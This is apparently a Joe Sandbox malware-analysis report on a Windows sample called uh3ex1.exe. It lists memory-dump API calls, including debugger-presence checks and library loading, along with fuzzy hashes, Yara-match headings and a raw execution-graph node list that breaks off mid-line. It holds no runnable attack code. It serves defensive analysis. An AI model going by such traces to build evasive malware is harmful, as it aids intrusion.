                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 7890ad71d7ec0dcdc172ea72531cd053d87d2f91ecbe4b8ad4aec589fc869789
                                                                                                                                                                                                                                                • Instruction ID: 5d293283f5ac56f106fe4ae35aed4a1eb1d0d09a06741b4089493f270cd8c7bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7890ad71d7ec0dcdc172ea72531cd053d87d2f91ecbe4b8ad4aec589fc869789
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 101129B1C006599FCB10CFAAD545BDEFBF4BB48720F10815AD419B7640C374AA44CFA5

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 934 fc4d6c-fc621c CloseHandle 937 fc621e-fc6224 934->937 938 fc6225-fc624d 934->938 937->938
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00FC620F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1565578576.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_fc0000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: f4994cf1f602807f3070c68ba897fae75d6fa81890bc252a556e712decd8aa49
                                                                                                                                                                                                                                                • Instruction ID: ab3d36b6d2b1b80f514482d5b0add04dbab367218ae24243b295232e6f0d5bbf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4994cf1f602807f3070c68ba897fae75d6fa81890bc252a556e712decd8aa49
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B51158B1804349CFDB10DF9AC445BEEBBF4EB48320F218469E528A7241D7B8A940CFA5

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 941 fc61a8-fc621c CloseHandle 943 fc621e-fc6224 941->943 944 fc6225-fc624d 941->944 943->944
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00FC620F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1565578576.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_fc0000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: 82fddfcb35862751ebf5b777cc16a35ca8663e0fec90800ff0a52c25d4630642
                                                                                                                                                                                                                                                • Instruction ID: c4d2d1a2b26aa3051699b00abaf51c884af04c0506a989349714885272fc3742
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82fddfcb35862751ebf5b777cc16a35ca8663e0fec90800ff0a52c25d4630642
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 691155B1800249CFDB10CF99C445BEEBBF4AF48320F21846AD428A7281D7B8A940CFA5
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D597AA6
                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6D597B72
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D597B8B
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6D597B95
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6D59BB4F
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6D59BB59
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,00000000), ref: 6D59BB66
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D597C6E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6D599609
                                                                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6D599717
                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6D599869
                                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6D599884
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6D5985C7
                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6D5985CF
                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6D598658
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6D598683
                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6D5986D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                • String ID: U|Ym$csm
                                                                                                                                                                                                                                                • API String ID: 1170836740-2912671930
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,6D59D569,00000000,6D59AD70,00000000,00000000,00000001,?,6D59D6E2,00000022,FlsSetValue,6D5A5688,6D5A5690,00000000), ref: 6D59D51B
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6B7C042E,00000000,?,00000000,6D5A2FB2,000000FF,?,6D59A638,?,?,6D59A60C,?), ref: 6D59A6D3
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D59A6E5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6D5A2FB2,000000FF,?,6D59A638,?,?,6D59A60C,?), ref: 6D59A707
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$U|Ym$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-4259744000
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,6D598771,6D597870,6D597289,?,6D5974C1,?,00000001,?,?,00000001,?,6D5A9498,0000000C,6D5975BA), ref: 6D598B4A
                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D598B58
                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D598B71
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,6D5974C1,?,00000001,?,?,00000001,?,6D5A9498,0000000C,6D5975BA,?,00000001,?), ref: 6D598BC3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
• Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                                • String ID: U|Ym
                                                                                                                                                                                                                                                • API String ID: 1740715915-3624290880
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Path1\To2\Save444\uh3ex1.exe, xrefs: 6D59C6AA
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: C:\Path1\To2\Save444\uh3ex1.exe
                                                                                                                                                                                                                                                • API String ID: 0-817657397
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 6D59F19D
                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 6D59F266
                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 6D59F2CD
                                                                                                                                                                                                                                                  • Part of subcall function 6D59E2BA: HeapAlloc.KERNEL32(00000000,6D59CC07,?,?,6D59CC07,00000220,?,00000000,?), ref: 6D59E2EC
                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 6D59F2E0
                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 6D59F2ED
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1096550386-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D5990C3,00000000,?,00000001,?,?,?,6D5991B2,00000001,FlsFree,6D5A4D60,FlsFree), ref: 6D59911F
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,6D5990C3,00000000,?,00000001,?,?,?,6D5991B2,00000001,FlsFree,6D5A4D60,FlsFree,00000000,?,6D598C11), ref: 6D599129
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D599151
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(6B7C042E,00000000,00000000,?), ref: 6D59F888
                                                                                                                                                                                                                                                  • Part of subcall function 6D59D25C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D59F2C3,?,00000000,-00000008), ref: 6D59D2BD
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D59FADA
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D59FB20
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 6D59FBC3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 6D59D25C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D59F2C3,?,00000000,-00000008), ref: 6D59D2BD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 6D59BF0C
                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6D59BF13
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6D59BF4D
                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6D59BF54
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6D59D307
                                                                                                                                                                                                                                                  • Part of subcall function 6D59D25C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D59F2C3,?,00000000,-00000008), ref: 6D59D2BD
                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D59D33F
                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D59D35F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6D5A095A,00000000,00000001,00000000,?,?,6D59FC17,?,00000000,00000000), ref: 6D5A11BD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,6D5A095A,00000000,00000001,00000000,?,?,6D59FC17,?,00000000,00000000,?,?,?,6D5A01BB,00000000), ref: 6D5A11C9
                                                                                                                                                                                                                                                  • Part of subcall function 6D5A118F: CloseHandle.KERNEL32(FFFFFFFE,6D5A11D9,?,6D5A095A,00000000,00000001,00000000,?,?,6D59FC17,?,00000000,00000000,?,?), ref: 6D5A119F
                                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 6D5A11D9
                                                                                                                                                                                                                                                  • Part of subcall function 6D5A1151: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D5A1180,6D5A0947,?,?,6D59FC17,?,00000000,00000000,?), ref: 6D5A1164
                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6D5A095A,00000000,00000001,00000000,?,?,6D59FC17,?,00000000,00000000,?), ref: 6D5A11EE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 6D59F825: GetConsoleOutputCP.KERNEL32(6B7C042E,00000000,00000000,?), ref: 6D59F888
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6D59E141,?), ref: 6D5A025E
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,6D59E141,?,6D59DFD4,00000000,?,00000000,6D59DFD4,?,00000000,00000000,6D5A98C0,0000002C,6D59E045,?), ref: 6D5A0268
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                • String ID: AYm
                                                                                                                                                                                                                                                • API String ID: 2915228174-263184403
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 6D5998B4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 6D59D748
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                                                • String ID: InitializeCriticalSectionEx$U|Ym
                                                                                                                                                                                                                                                • API String ID: 2593887523-3525665559
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Alloc
                                                                                                                                                                                                                                                • String ID: FlsAlloc$U|Ym
                                                                                                                                                                                                                                                • API String ID: 2773662609-712174389

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:15.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0.7%
                                                                                                                                                                                                                                                Total number of Nodes:402
                                                                                                                                                                                                                                                Total number of Limit Nodes:28
7601d7e 105931->105935 105932 7601d65 105932->105870 105933->105870 105936 7601d70 4 API calls 105933->105936 105937 7601d80 4 API calls 105933->105937 105938 7602550 4 API calls 105933->105938 105939 7602a23 4 API calls 105933->105939 105940 7602a33 4 API calls 105933->105940 105941 7602a18 4 API calls 105933->105941 105942 7602a1a 4 API calls 105933->105942 105943 76029bd 4 API calls 105933->105943 105934 7602a59 105934->105934 105935->105934 105944 76034c0 4 API calls 105935->105944 105945 76034d0 4 API calls 105935->105945 105946 76036e8 4 API calls 105935->105946 105936->105932 105937->105932 105938->105932 105939->105932 105940->105932 105941->105932 105942->105932 105943->105932 105944->105935 105945->105935 105946->105935 105949 7601e85 105947->105949 105948 7602a59 105948->105948 105949->105948 105989 76034d0 105949->105989 105993 76034c0 105949->105993 105997 76036e8 105949->105997 105954 7601e85 105953->105954 105955 7602a59 105954->105955 105956 76034c0 4 API calls 105954->105956 105957 76034d0 4 API calls 105954->105957 105958 76036e8 4 API calls 105954->105958 105955->105955 105956->105954 105957->105954 105958->105954 105961 7601e85 105959->105961 105960 7602a59 105960->105960 105961->105960 105962 76036e8 4 API calls 105961->105962 105963 76034c0 4 API calls 105961->105963 105964 76034d0 4 API calls 105961->105964 105962->105961 105963->105961 105964->105961 105967 7601dad 105965->105967 105966 7602a59 105966->105966 105967->105966 105968 76036e8 4 API calls 105967->105968 105969 76034c0 4 API calls 105967->105969 105970 76034d0 4 API calls 105967->105970 105968->105967 105969->105967 105970->105967 105973 7601e85 105971->105973 105972 7602a59 105972->105972 105973->105972 105974 76034c0 4 API calls 105973->105974 105975 76034d0 4 API calls 105973->105975 105976 76036e8 4 API calls 105973->105976 105974->105973 105975->105973 105976->105973 105979 7601e85 105977->105979 105978 7602a59 105978->105978 105979->105978 105980 76036e8 4 API calls 
